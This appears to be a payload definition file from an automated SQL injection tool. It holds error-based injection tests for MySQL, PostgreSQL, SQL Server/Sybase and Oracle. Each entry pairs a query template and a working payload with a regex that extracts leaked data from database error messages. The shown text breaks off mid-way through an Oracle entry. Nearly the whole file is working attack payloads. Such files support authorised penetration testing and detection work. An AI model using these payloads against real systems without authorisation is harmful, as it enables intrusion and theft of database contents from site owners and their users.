Path: blob/master/data/xml/payloads/error_based.xml
2992 views
<?xml version="1.0" encoding="UTF-8"?>12<root>3<!-- Error-based tests - WHERE, HAVING, ORDER BY or GROUP BY clause -->4<test>5<title>MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)</title>6<stype>2</stype>7<level>4</level>8<risk>1</risk>9<clause>1,2,3,8,9</clause>10<where>1</where>11<vector>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>12<request>13<!-- These work as good as ELT(), but are longer14<payload>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>15<payload>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>16-->17<payload>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>18</request>19<response>20<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>21</response>22<details>23<dbms>MySQL</dbms>24<dbms_version>>= 5.5</dbms_version>25</details>26</test>2728<test>29<!-- It does not work against ORDER BY or GROUP BY clause -->30<title>MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)</title>31<stype>2</stype>32<level>4</level>33<risk>3</risk>34<clause>1,8,9</clause>35<where>1</where>36<vector>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>37<request>38<!-- These work as good as ELT(), but are longer39<payload>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>40<payload>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>41-->42<payload>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>43</request>44<response>45<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>46</response>47<details>48<dbms>MySQL</dbms>49<dbms_version>>= 5.5</dbms_version>50</details>51</test>5253<test>54<title>MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)</title>55<stype>2</stype>56<level>4</level>57<risk>1</risk>58<clause>1,2,3,8,9</clause>59<where>1</where>60<vector>AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>61<request>62<payload>AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x))</payload>63</request>64<response>65<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>66</response>67<details>68<dbms>MySQL</dbms>69<dbms_version>>= 5.5</dbms_version>70</details>71</test>7273<test>74<title>MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)</title>75<stype>2</stype>76<level>4</level>77<risk>3</risk>78<clause>1,8,9</clause>79<where>1</where>80<vector>OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>81<request>82<payload>OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x))</payload>83</request>84<response>85<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>86</response>87<details>88<dbms>MySQL</dbms>89<dbms_version>>= 5.5</dbms_version>90</details>91</test>9293<test>94<title>MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)</title>95<stype>2</stype>96<level>4</level>97<risk>1</risk>98<clause>1,2,3,8,9</clause>99<where>1</where>100<vector>AND GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>101<request>102<payload>AND GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>103</request>104<response>105<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>106</response>107<details>108<dbms>MySQL</dbms>109<dbms_version>>= 5.6</dbms_version>110</details>111</test>112113<test>114<title>MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)</title>115<stype>2</stype>116<level>4</level>117<risk>3</risk>118<clause>1,8,9</clause>119<where>1</where>120<vector>OR GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>121<request>122<payload>OR GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>123</request>124<response>125<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>126</response>127<details>128<dbms>MySQL</dbms>129<dbms_version>>= 5.6</dbms_version>130</details>131</test>132133<test>134<title>MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)</title>135<stype>2</stype>136<level>5</level>137<risk>1</risk>138<clause>1,2,3,8,9</clause>139<where>1</where>140<vector>AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8)))</vector>141<request>142<payload>AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8)))</payload>143</request>144<response>145<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>146</response>147<details>148<dbms>MySQL</dbms>149<dbms_version>>= 5.7.8</dbms_version>150</details>151</test>152153<test>154<!-- It does not work against ORDER BY or GROUP BY clause -->155<title>MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)</title>156<stype>2</stype>157<level>5</level>158<risk>3</risk>159<clause>1,8,9</clause>160<where>1</where>161<vector>OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8)))</vector>162<request>163<payload>OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8)))</payload>164</request>165<response>166<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>167</response>168<details>169<dbms>MySQL</dbms>170<dbms_version>>= 5.7.8</dbms_version>171</details>172</test>173174<test>175<title>MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title>176<stype>2</stype>177<level>2</level>178<risk>1</risk>179<clause>1,2,3,8,9</clause>180<where>1</where>181<vector>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</vector>182<request>183<!-- These work as good as ELT(), but are longer184<payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>185<payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>186-->187<payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>188</request>189<response>190<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>191</response>192<details>193<dbms>MySQL</dbms>194<dbms_version>>= 5.0</dbms_version>195</details>196</test>197198<test>199<title>MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title>200<stype>2</stype>201<level>2</level>202<risk>3</risk>203<clause>1,2,3,8,9</clause>204<!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->205<where>1</where>206<vector>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</vector>207<request>208<!-- These work as good as ELT(), but are longer209<payload>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>210<payload>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>211-->212<payload>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>213</request>214<response>215<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>216</response>217<details>218<dbms>MySQL</dbms>219<dbms_version>>= 5.0</dbms_version>220</details>221</test>222223<test>224<title>MySQL >= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title>225<stype>2</stype>226<level>5</level>227<risk>1</risk>228<clause>7</clause>229<where>1</where>230<vector>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</vector>231<request>232<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>233</request>234<response>235<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>236</response>237<details>238<dbms>MySQL</dbms>239<dbms_version>>= 5.0</dbms_version>240</details>241</test>242243<test>244<title>MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>245<stype>2</stype>246<level>1</level>247<risk>1</risk>248<clause>1,2,3,8,9</clause>249<where>1</where>250<vector>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>251<request>252<!-- These work as good as ELT(), but are longer253<payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>254<payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>255-->256<payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>257</request>258<response>259<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>260</response>261<details>262<dbms>MySQL</dbms>263<dbms_version>>= 5.1</dbms_version>264</details>265</test>266267<test>268<title>MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>269<stype>2</stype>270<level>1</level>271<risk>3</risk>272<clause>1,2,3,8,9</clause>273<!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->274<where>1</where>275<vector>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>276<request>277<!-- These work as good as ELT(), but are longer278<payload>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>279<payload>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>280-->281<payload>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>282</request>283<response>284<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>285</response>286<details>287<dbms>MySQL</dbms>288<dbms_version>>= 5.1</dbms_version>289</details>290</test>291292<test>293<title>MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)</title>294<stype>2</stype>295<level>3</level>296<risk>1</risk>297<clause>1,2,3,8,9</clause>298<where>1</where>299<vector>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>300<request>301<!-- These work as good as ELT(), but are longer302<payload>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>303<payload>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>304-->305<payload>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>306</request>307<response>308<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>309</response>310<details>311<dbms>MySQL</dbms>312<dbms_version>>= 5.1</dbms_version>313</details>314</test>315316<test>317<title>MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)</title>318<stype>2</stype>319<level>3</level>320<risk>3</risk>321<clause>1,2,3,8,9</clause>322<!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->323<where>1</where>324<vector>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>325<request>326<!-- These work as good as ELT(), but are longer327<payload>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>328<payload>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>329-->330<payload>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>331</request>332<response>333<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>334</response>335<details>336<dbms>MySQL</dbms>337<dbms_version>>= 5.1</dbms_version>338</details>339</test>340341<test>342<title>MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title>343<stype>2</stype>344<level>3</level>345<risk>1</risk>346<clause>1,2,3,8,9</clause>347<where>1</where>348<vector>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>349<request>350<!-- These work as good as ELT(), but are longer351<payload>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>352<payload>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>353-->354<payload>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>355</request>356<response>357<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>358</response>359<details>360<dbms>MySQL</dbms>361<dbms_version>>= 4.1</dbms_version>362</details>363</test>364365<test>366<!-- It does not work against ORDER BY or GROUP BY clause -->367<title>MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)</title>368<stype>2</stype>369<level>3</level>370<risk>3</risk>371<clause>1,8,9</clause>372<where>1</where>373<vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>374<request>375<!-- These work as good as ELT(), but are longer376<payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>377<payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>378-->379<payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>380</request>381<response>382<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>383</response>384<details>385<dbms>MySQL</dbms>386<dbms_version>>= 4.1</dbms_version>387</details>388</test>389390<!-- This payload with AND does not work -->391<test>392<title>MySQL OR error-based - WHERE or HAVING clause (FLOOR)</title>393<stype>2</stype>394<level>4</level>395<risk>3</risk>396<clause>1,8,9</clause>397<where>2</where>398<vector>OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>399<request>400<payload>OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</payload>401<comment>#</comment>402</request>403<response>404<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>405</response>406<details>407<dbms>MySQL</dbms>408</details>409</test>410411<test>412<title>PostgreSQL AND error-based - WHERE or HAVING clause</title>413<stype>2</stype>414<level>1</level>415<risk>1</risk>416<clause>1,8,9</clause>417<where>1</where>418<vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>419<request>420<payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>421</request>422<response>423<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>424</response>425<details>426<dbms>PostgreSQL</dbms>427</details>428</test>429430<test>431<title>PostgreSQL OR error-based - WHERE or HAVING clause</title>432<stype>2</stype>433<level>1</level>434<risk>3</risk>435<clause>1,8,9</clause>436<where>2</where>437<vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>438<request>439<payload>OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>440</request>441<response>442<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>443</response>444<details>445<dbms>PostgreSQL</dbms>446</details>447</test>448449<test>450<title>Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)</title>451<stype>2</stype>452<level>1</level>453<risk>1</risk>454<clause>1,8,9</clause>455<where>1</where>456<vector>AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>457<request>458<payload>AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>459</request>460<response>461<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>462</response>463<details>464<dbms>Microsoft SQL Server</dbms>465<dbms>Sybase</dbms>466</details>467</test>468469<test>470<title>Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)</title>471<stype>2</stype>472<level>2</level>473<risk>3</risk>474<clause>1,8,9</clause>475<where>2</where>476<vector>OR [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>477<request>478<payload>OR [RANDNUM] IN (SELECT ('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>479</request>480<response>481<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>482</response>483<details>484<dbms>Microsoft SQL Server</dbms>485<dbms>Sybase</dbms>486</details>487</test>488489<test>490<title>Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)</title>491<stype>2</stype>492<level>2</level>493<risk>1</risk>494<clause>1,8,9</clause>495<where>1</where>496<vector>AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>497<request>498<payload>AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>499</request>500<response>501<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>502</response>503<details>504<dbms>Microsoft SQL Server</dbms>505<dbms>Sybase</dbms>506</details>507</test>508509<test>510<title>Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONVERT)</title>511<stype>2</stype>512<level>3</level>513<risk>3</risk>514<clause>1,8,9</clause>515<where>2</where>516<vector>OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>517<request>518<payload>OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>519</request>520<response>521<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>522</response>523<details>524<dbms>Microsoft SQL Server</dbms>525<dbms>Sybase</dbms>526</details>527</test>528529<test>530<title>Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)</title>531<stype>2</stype>532<level>2</level>533<risk>1</risk>534<clause>1,8,9</clause>535<where>1</where>536<vector>AND [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')</vector>537<request>538<payload>AND [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]')</payload>539</request>540<response>541<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>542</response>543<details>544<dbms>Microsoft SQL Server</dbms>545<dbms>Sybase</dbms>546</details>547</test>548549<test>550<title>Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)</title>551<stype>2</stype>552<level>3</level>553<risk>3</risk>554<clause>1,8,9</clause>555<where>2</where>556<vector>OR [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')</vector>557<request>558<payload>OR [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]')</payload>559</request>560<response>561<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>562</response>563<details>564<dbms>Microsoft SQL Server</dbms>565<dbms>Sybase</dbms>566</details>567</test>568569<test>570<title>Oracle AND error-based - WHERE or HAVING clause (XMLType)</title>571<stype>2</stype>572<level>1</level>573<risk>1</risk>574<clause>1,9</clause>575<where>1</where>576<vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>577<request>578<payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>579</request>580<response>581<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>582</response>583<details>584<dbms>Oracle</dbms>585</details>586</test>587588<test>589<title>Oracle OR error-based - WHERE or HAVING clause (XMLType)</title>590<stype>2</stype>591<level>1</level>592<risk>3</risk>593<clause>1,9</clause>594<where>2</where>595<vector>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>596<request>597<payload>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM 